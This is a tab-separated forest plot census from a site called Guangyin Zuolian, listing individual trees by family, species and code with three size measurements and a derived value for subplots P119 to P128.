Guangyin Zuolian	2	P119	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	25	10	8.5	0.243128
Guangyin Zuolian	2	P119	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	10	9	7.5	0.0393034
Guangyin Zuolian	2	P119	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	28	9	2.5	0.271066
Guangyin Zuolian	2	P120	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	2	2	0.5	0.00043664
Guangyin Zuolian	2	P120	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	7	5	2.5	0.0112844
Guangyin Zuolian	2	P120	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	14	7.5	0.5	0.0617309
Guangyin Zuolian	2	P120	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	18	8	4.5	0.105393
Guangyin Zuolian	2	P120	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	21	8	5	0.140724
Guangyin Zuolian	2	P120	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	2	3.5	2.5	0.000757716
Guangyin Zuolian	2	P120	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	1.5	0.7	1.8	9.05162e-05
Guangyin Zuolian	2	P120	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	2	1.7	1	0.000372052
Guangyin Zuolian	2	P120	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	4	1.6	0.00481906
Guangyin Zuolian	2	P120	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	11	4.5	3.5	0.0237443
Guangyin Zuolian	2	P120	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	9	5	3.5	0.0180792
Guangyin Zuolian	2	P120	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	6	4	0.0135042
Guangyin Zuolian	2	P120	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.5	0.5	0.0003289
Guangyin Zuolian	2	P120	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.5	0.5	0.0003289
Guangyin Zuolian	2	P120	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.5	1.8	1	0.000598148
Guangyin Zuolian	2	P120	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.5	2	0.5	0.000663557
Guangyin Zuolian	2	P120	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	2	0.7	0.000934077
Guangyin Zuolian	2	P120	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	25	10	2.5	0.243128
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2.5	3	1	0.000989284
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	3	2.5	0.0013926
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3.5	3	2.5	0.00185945
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	3	1	0.00510984
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	4.5	2	0.0020762
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	4.5	3	0.00761816
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	4.5	2	0.0101721
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	4.5	1.5	0.0101721
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	4.5	3	0.0101721
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	5	2	0.00600364
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	5	3	0.00845122
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	5	2.5	0.0144958
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	6	1.5	0.0135042
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	7	2	0.0157184
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	7	5	0.0157184
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	8	4	0.0418484
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2.	8.5	5	0.00181577
Guangyin Zuolian	2	P120	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	10	3	0.131299
Guangyin Zuolian	2	P120	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2.5	2.5	1	0.000826667
Guangyin Zuolian	2	P120	Ulmaceae	Celtis	Celtis tetrandra ssp. sinensis (Pers.) Y.C.Tang	CELTET	12	8	3	0.0492664
Guangyin Zuolian	2	P120	Rutaceae	Evodia	Evodia lepta (Spreng.) Merr.	EVOLEP	2.5	4	1	0.00131335
Guangyin Zuolian	2	P120	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	4	3	2	0.00238863
Guangyin Zuolian	2	P120	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	7	3	0.5	0.00682285
Guangyin Zuolian	2	P120	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	5	3.5	1.5	0.00422516
Guangyin Zuolian	2	P120	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	5	3.5	2	0.00422516
Guangyin Zuolian	2	P120	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	2.5	2	0.000543971
Guangyin Zuolian	2	P120	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	3	2.5	0.00238863
Guangyin Zuolian	2	P120	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	3	2	0.00510984
Guangyin Zuolian	2	P120	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	3.5	2	0.00162093
Guangyin Zuolian	2	P120	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	3.5	3	0.00422516
Guangyin Zuolian	2	P120	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	4	2	0.0067837
Guangyin Zuolian	2	P120	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	9	4.5	3	0.0162971
Guangyin Zuolian	2	P121	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	4	3	0.00317108
Guangyin Zuolian	2	P121	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	11	6	5	0.0315224
Guangyin Zuolian	2	P121	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	12	10	8	0.0613767
Guangyin Zuolian	2	P121	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	7	8	6	0.0179278
Guangyin Zuolian	2	P121	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	6.5	5	0.0109433
Guangyin Zuolian	2	P121	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	1	3	1.5	0.000177413
Guangyin Zuolian	2	P121	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	4.5	3.5	0.0020762
Guangyin Zuolian	2	P122	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	5	7.5	5	0.00895072
Guangyin Zuolian	2	P122	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	32	17	10	0.651465
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	3	5	2.5	0.00230323
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	5	4	0.00395057
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	5.5	4	0.00659455
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	6	4	0.03711
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	7	6	0.011772
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	7	3	0.0201917
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	8	6.5	0.0349983
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	8.5	6.5	0.019031
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	18	9	1.5	0.118357
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	9.5	7	0.0414532
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	10	7	0.0613767
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	16	10	3.5	0.105275
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	18	11	6.5	0.144222
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	20	11	6	0.175732
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	30	12	3.5	0.409572
Guangyin Zuolian	2	P122	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	6	4	0.0173473
Guangyin Zuolian	2	P122	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	7	4	0.0201917
Guangyin Zuolian	2	P122	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	7.5	1.6	0.0328428
Guangyin Zuolian	2	P122	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	12	7.5	1.9	0.0462321
Guangyin Zuolian	2	P122	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	13	8	2	0.0572463
Guangyin Zuolian	2	P122	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	14	8	4	0.0657824
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus oculodracontis Chun	MACOCU	1.5	2	1.7	0.000254566
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus oculodracontis Chun	MACOCU	2	2	1.4	0.00043664
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus oculodracontis Chun	MACOCU	3	2.5	1.4	0.00116368
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus oculodracontis Chun	MACOCU	2	3	1.4	0.000650978
Guangyin Zuolian	2	P122	Lauraceae	Machilus	Machilus oculodracontis Chun	MACOCU	3	3	1.5	0.0013926
Guangyin Zuolian	2	P122	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	2.5	1.5	0.000543971
Guangyin Zuolian	2	P122	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	4	4	2	0.00317108
Guangyin Zuolian	2	P122	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	5	4	2.5	0.00481906
Guangyin Zuolian	2	P122	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	6	5	3	0.00845122
Guangyin Zuolian	2	P122	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	5	6	2	0.00718464
Guangyin Zuolian	2	P122	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	5	6	3	0.00718464
Guangyin Zuolian	2	P122	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	6	7	2	0.011772
Guangyin Zuolian	2	P122	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	14	7	1.6	0.0576753
Guangyin Zuolian	2	P122	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	8	7.5	2	0.0216115
Guangyin Zuolian	2	P122	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	3	2.5	0.0013926
Guangyin Zuolian	2	P122	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	3	2.5	2	0.00116368
Guangyin Zuolian	2	P123	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	1	2.5	2	0.00014825
Guangyin Zuolian	2	P123	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	1.5	3	1.5	0.000379528
Guangyin Zuolian	2	P123	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	3.2	2	0.000693703
Guangyin Zuolian	2	P123	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	4	5.5	3	0.00433941
Guangyin Zuolian	2	P123	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	2	3	1.5	0.000650978
Guangyin Zuolian	2	P123	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	2.5	6	2.5	0.00195805
Guangyin Zuolian	2	P123	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	13	9	6	0.0642881
Guangyin Zuolian	2	P123	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.2	0.3	7.19498e-05
Guangyin Zuolian	2	P123	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.5	0.3	8.96359e-05
Guangyin Zuolian	2	P123	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	1.8	0.8	0.000229473
Guangyin Zuolian	2	P123	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	1.1	0.000118999
Guangyin Zuolian	2	P123	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2	0.5	0.00043664
Guangyin Zuolian	2	P123	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	8	5.5	0.0349983
Guangyin Zuolian	2	P123	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	5	3.5	0.00107666
Guangyin Zuolian	2	P123	Ulmaceae	Celtis	Celtis tetrandra ssp. sinensis (Pers.) Y.C.Tang	CELTET	2	6	4	0.00128845
Guangyin Zuolian	2	P123	Ulmaceae	Celtis	Celtis tetrandra ssp. sinensis (Pers.) Y.C.Tang	CELTET	4	7	5	0.00550289
Guangyin Zuolian	2	P123	Rutaceae	Evodia	Evodia lepta (Spreng.) Merr.	EVOLEP	1	3	1.5	0.000177413
Guangyin Zuolian	2	P123	Annonaceae	Uvaria	Uvaria grandiflora Roxb.	UVAGRA	2	3	1.5	0.000650978
Guangyin Zuolian	2	P123	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	1	2	1.2	0.000118999
Guangyin Zuolian	2	P123	Lauraceae	Cinnamomum	Cinnamomum burmanii (C. G. et Th.Nees) Bl.	CINBUR	1	3	2	0.000177413
Guangyin Zuolian	2	P123	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	14	11	3.5	0.0900186
Guangyin Zuolian	2	P124	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	10	6	4	0.0263625
Guangyin Zuolian	2	P124	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	3	7	2.5	0.00320825
Guangyin Zuolian	2	P124	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	4	7	6	0.00550289
Guangyin Zuolian	2	P124	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	6	7.5	5	0.0125998
Guangyin Zuolian	2	P124	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	3	8	1.8	0.00365921
Guangyin Zuolian	2	P124	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	8	8	6	0.0230299
Guangyin Zuolian	2	P124	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	7	4	3	0.00905786
Guangyin Zuolian	2	P124	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	6	4.5	1.9	0.00761816
Guangyin Zuolian	2	P124	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	9	5.5	4	0.0198586
Guangyin Zuolian	2	P124	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	8	6	2.3	0.0173473
Guangyin Zuolian	2	P124	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	10	7	5	0.0306851
Guangyin Zuolian	2	P124	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	9	8.2	0.0553266
Guangyin Zuolian	2	P124	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	25	9	7	0.219163
Guangyin Zuolian	2	P124	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	14	8	7	0.0657824
Guangyin Zuolian	2	P124	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.4	0.7	0.000307292
Guangyin Zuolian	2	P124	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.5	0.8	0.0003289
Guangyin Zuolian	2	P124	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	1.6	0.8	0.000204338
Guangyin Zuolian	2	P124	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.8	0.6	0.000393599
Guangyin Zuolian	2	P124	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	7	6	0.0366909
Guangyin Zuolian	2	P124	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	26	8	6	0.210053
Guangyin Zuolian	2	P124	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	1.8	1.5	0.000393599
Guangyin Zuolian	2	P124	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	2.2	1.7	0.000479616
Guangyin Zuolian	2	P124	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	2.8	1.5	0.00060821
Guangyin Zuolian	2	P124	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	3	1.8	0.000650978
Guangyin Zuolian	2	P124	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	2	1.8	1.6	0.000393599
Guangyin Zuolian	2	P124	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	5	2	1.8	0.00243478
Guangyin Zuolian	2	P124	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	4	2.3	2	0.00183861
Guangyin Zuolian	2	P124	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	3.5	5	4	0.00307536
Guangyin Zuolian	2	P124	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	4	5	4	0.00395057
Guangyin Zuolian	2	P124	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	4	5.5	4.5	0.00433941
Guangyin Zuolian	2	P124	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	6	8	6.8	0.0134267
Guangyin Zuolian	2	P124	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	10	8	6	0.0349983
Guangyin Zuolian	2	P124	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	4.8	4	0.00379488
Guangyin Zuolian	2	P124	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	5	4	0.00600364
Guangyin Zuolian	2	P124	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	9	8	0.00704845
Guangyin Zuolian	2	P124	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	6	5	0.03711
Guangyin Zuolian	2	P124	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	6	0.0201917
Guangyin Zuolian	2	P124	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	20	8	7.5	0.128419
Guangyin Zuolian	2	P124	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	18	9	8	0.118357
Guangyin Zuolian	2	P125	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	13	4	3	0.0289231
Guangyin Zuolian	2	P125	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	12	4.5	2.5	0.0279532
Guangyin Zuolian	2	P125	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	11	7	4	0.0366909
Guangyin Zuolian	2	P125	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	5	3.5	3	0.00422516
Guangyin Zuolian	2	P125	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	3	1.5	0.0013926
Guangyin Zuolian	2	P125	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	2.5	2	1	0.000663557
Guangyin Zuolian	2	P125	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	7	3	0.0431948
Guangyin Zuolian	2	P125	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	13	7.5	5	0.0537205
Guangyin Zuolian	2	P125	Myrsinaceae	Maesa	Maesa perlarius (Lour.) Merr.	MAEPER	2	3	1	0.000650978
Guangyin Zuolian	2	P125	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.5	2	1	0.000663557
Guangyin Zuolian	2	P125	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	2	0.5	0.000934077
Guangyin Zuolian	2	P125	Lauraceae	Cinnamomum	Cinnamomum burmanii (C. G. et Th.Nees) Bl.	CINBUR	3	3	1	0.0013926
Guangyin Zuolian	2	P125	Lauraceae	Cinnamomum	Cinnamomum burmanii (C. G. et Th.Nees) Bl.	CINBUR	6	3.5	1.5	0.00594767
Guangyin Zuolian	2	P126	Aceraceae	Acer	Acer oblongum Wall. ex DC.	ACEOBL	3	4.5	2.5	0.0020762
Guangyin Zuolian	2	P126	Aceraceae	Acer	Acer oblongum Wall. ex DC.	ACEOBL	4	4.5	2.5	0.00356116
Guangyin Zuolian	2	P126	Aceraceae	Acer	Acer oblongum Wall. ex DC.	ACEOBL	4	4.5	2.5	0.00356116
Guangyin Zuolian	2	P126	Aceraceae	Acer	Acer oblongum Wall. ex DC.	ACEOBL	4	4.5	2.5	0.00356116
Guangyin Zuolian	2	P126	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	5	5	3	0.00600364
Guangyin Zuolian	2	P126	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	9	10	6.5	0.0357834
Guangyin Zuolian	2	P126	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	6	4	3.5	0.0067837
Guangyin Zuolian	2	P126	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	3	7	6	0.00320825
Guangyin Zuolian	2	P126	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	10	10	8	0.0436013
Guangyin Zuolian	2	P126	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	13	10	5	0.0713181
Guangyin Zuolian	2	P126	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	22	10	5	0.191299
Guangyin Zuolian	2	P126	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	8	11	8	0.0315148
Guangyin Zuolian	2	P126	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	13	11	6.5	0.0783376
Guangyin Zuolian	2	P126	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	63	11	9	1.51158
Guangyin Zuolian	2	P126	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	8	6	0.0349983
Guangyin Zuolian	2	P126	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	3	3.5	1.5	0.00162093
Guangyin Zuolian	2	P126	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	4	4.5	2.5	0.00356116
Guangyin Zuolian	2	P126	Caesalpiniaceae	Lysidice	Lysidice rhodostegia Hance	LYSRHO	5	4.5	3	0.00541185
Guangyin Zuolian	2	P126	Caesalpiniaceae	Lysidice	Lysidice rhodostegia Hance	LYSRHO	10	6.5	5.5	0.028525
Guangyin Zuolian	2	P127	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	18	9	4.5	0.118357
Guangyin Zuolian	2	P127	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	3	2	0.0013926
Guangyin Zuolian	2	P127	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	6	7	3.5	0.011772
Guangyin Zuolian	2	P127	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	14	11	6	0.0900186
Guangyin Zuolian	2	P127	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	20	11	5	0.175732
Guangyin Zuolian	2	P127	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	18	11	8	0.144222
Guangyin Zuolian	2	P127	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	26	11	4	0.287443
Guangyin Zuolian	2	P127	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	16	9	5	0.094898
Guangyin Zuolian	2	P127	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	5	4	1.7	0.00481906
Guangyin Zuolian	2	P127	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	6	4.5	2	0.00761816
Guangyin Zuolian	2	P127	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	5	6	1.4	0.00718464
Guangyin Zuolian	2	P127	Ulmaceae	Celtis	Celtis tetrandra ssp. sinensis (Pers.) Y.C.Tang	CELTET	6	5	4	0.00845122
Guangyin Zuolian	2	P127	Ulmaceae	Celtis	Celtis tetrandra ssp. sinensis (Pers.) Y.C.Tang	CELTET	16	8	4.5	0.0845033
Guangyin Zuolian	2	P127	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	2	3	1.3	0.000650978
Guangyin Zuolian	2	P127	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	4	5.5	3	0.00433941
Guangyin Zuolian	2	P127	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	5	6	3	0.00718464
Guangyin Zuolian	2	P127	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	6	6	1.5	0.0101137
Guangyin Zuolian	2	P127	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	6	7	1.8	0.011772
Guangyin Zuolian	2	P127	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	8	7	3	0.0201917
Guangyin Zuolian	2	P127	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	10	7	3	0.0306851
Guangyin Zuolian	2	P127	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	8	7.5	5	0.0216115
Guangyin Zuolian	2	P127	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	12	8	4	0.0492664
Guangyin Zuolian	2	P128	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	4	6.5	4.5	0.00511552
Guangyin Zuolian	2	P128	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	2.6	1.2	0.000565396
